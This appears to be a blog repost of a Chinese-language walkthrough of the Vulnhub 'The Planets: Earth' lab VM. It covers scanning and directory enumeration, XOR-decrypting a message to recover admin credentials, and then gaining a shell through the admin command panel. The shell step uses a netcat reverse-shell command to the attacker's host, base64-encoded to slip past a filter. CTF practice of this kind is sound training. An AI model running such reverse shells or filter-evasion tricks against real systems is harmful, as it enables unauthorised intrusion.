Vulnhub之The Planets Earth靶機測試過程
阿新 • • 發佈:2022-12-11
The Planets Earth
識別目標主機IP地址
─(kali㉿kali)-[~/Vulnhub/The_Planets_Earth] └─$ sudo netdiscover -i eth1 Currently scanning: 192.168.134.0/16 | Screen View: Unique Hosts 3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor 192.168.56.100 08:00:27:6f:27:91 1 60 PCS Systemtechnik GmbH 192.168.56.229 08:00:27:c0:ac:18 1 60 PCS Systemtechnik GmbH
利用Kali Linux自帶的netdiscover工具識別目標主機的IP地址為192.168.56.229
NMAP掃描
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth] └─$ sudo nmap -sS -sV -sC -p- 192.168.56.229 -oN nmap_full_scan Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-10 08:40 EST Nmap scan report for bogon (192.168.56.229) Host is up (0.00034s latency). Not shown: 65382 filtered tcp ports (no-response), 150 filtered tcp ports (admin-prohibited) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.6 (protocol 2.0) | ssh-hostkey: | 256 5b:2c:3f:dc:8b:76:e9:21:7b:d0:56:24:df:be:e9:a8 (ECDSA) |_ 256 b0:3c:72:3b:72:21:26:ce:3a:84:e8:41:ec:c8:f8:41 (ED25519) 80/tcp open http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9) |_http-title: Bad Request (400) |_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9 443/tcp open ssl/http Apache httpd 2.4.51 ((Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9) |_http-title: Bad Request (400) | ssl-cert: Subject: commonName=earth.local/stateOrProvinceName=Space | Subject Alternative Name: DNS:earth.local, DNS:terratest.earth.local | Not valid before: 2021-10-12T23:26:31 |_Not valid after: 2031-10-10T23:26:31 |_http-server-header: Apache/2.4.51 (Fedora) OpenSSL/1.1.1l mod_wsgi/4.7.1 Python/3.9 | tls-alpn: |_ http/1.1 |_ssl-date: TLS randomness does not represent time MAC Address: 08:00:27:C0:AC:18 (Oracle VirtualBox virtual NIC) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 160.33 seconds
NMAP掃描出識別出主機名: earth.local, terratest.earth.local,將其加入/etc/hosts檔案中。
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth] └─$ sudo vim /etc/hosts ┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth] └─$ cat /etc/hosts 127.0.0.1 localhost 127.0.1.1 kali ::1 localhost ip6-localhost ip6-loopback ff02::1 ip6-allnodes ff02::2 ip6-allrouters 192.168.56.229 terratest.earth.local 192.168.56.229 earth.local
獲得Shell
訪問80埠,需要訪問主機名而不是IP地址。
──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ gobuster dir -u http://earth.local -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://earth.local
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/10 21:40:27 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 0] [--> /admin/]
Progress: 220100 / 220561 (99.79%)===============================================================
2022/12/10 21:43:51 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl -k https://terratest.earth.local/robots.txt
User-Agent: *
Disallow: /*.asp
Disallow: /*.aspx
Disallow: /*.bat
Disallow: /*.c
Disallow: /*.cfm
Disallow: /*.cgi
Disallow: /*.com
Disallow: /*.dll
Disallow: /*.exe
Disallow: /*.htm
Disallow: /*.html
Disallow: /*.inc
Disallow: /*.jhtml
Disallow: /*.jsa
Disallow: /*.json
Disallow: /*.jsp
Disallow: /*.log
Disallow: /*.mdb
Disallow: /*.nsf
Disallow: /*.php
Disallow: /*.phtml
Disallow: /*.pl
Disallow: /*.reg
Disallow: /*.sh
Disallow: /*.shtml
Disallow: /*.sql
Disallow: /*.txt
Disallow: /*.xml
Disallow: /testingnotes.*
猜測副檔名是.txt即,/testingnotes.txt
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl https://terratest.earth.local/testingnotes.txt -k
Testing secure messaging system notes:
*Using XOR encryption as the algorithm, should be safe as used in RSA.
*Earth has confirmed they have received our sent messages.
*testdata.txt was used to test encryption.
*terra used as username for admin portal.
Todo:
*How do we send our monthly keys to Earth securely? Or should we change keys weekly?
*Need to test different key lengths to protect against bruteforce. How long should the key be?
*Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
從testingnotes.txt檔案可知:
-
admin portal的使用者名稱是terra
-
首頁中的資訊加密演算法是XOR
-
XOR中的key可能來自於testdata.txt
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ curl https://terratest.earth.local/testdata.txt -k
According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago.
開啟線上網站cyberchef, XOR的key即為testdata.txt的內容:
而加密的資訊是首頁中的第三段十六進位制資料:
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a
從而admin portal的密碼為:
earthclimatechangebad4humans
也就是說使用者名稱:
username: terra
password:earthclimatechangebad4humans
登入admin portal,登入成功後為命令執行視窗:
當時輸入:nc -e /bin/bash 192.168.56.206 5555
得到錯誤提示:Remote connections are forbidden.
需要用base64 編碼:
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ echo 'nc -e /bin/bash 192.168.56.206 5555' | base64
bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMjA2IDU1NTUK
然後在命令框輸入:
echo bmMgLWUgL2Jpbi9iYXNoIDE5Mi4xNjguNTYuMjA2IDU1NTUK | base64 -d | bassh
┌──(kali㉿kali)-[~/Vulnhub/The_Planets_Earth]
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.229] 40676
id
uid=48(apache) gid=48(apache) groups=48(apache)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
bash-5.1$ ls
在Kali Linux成功得到了shell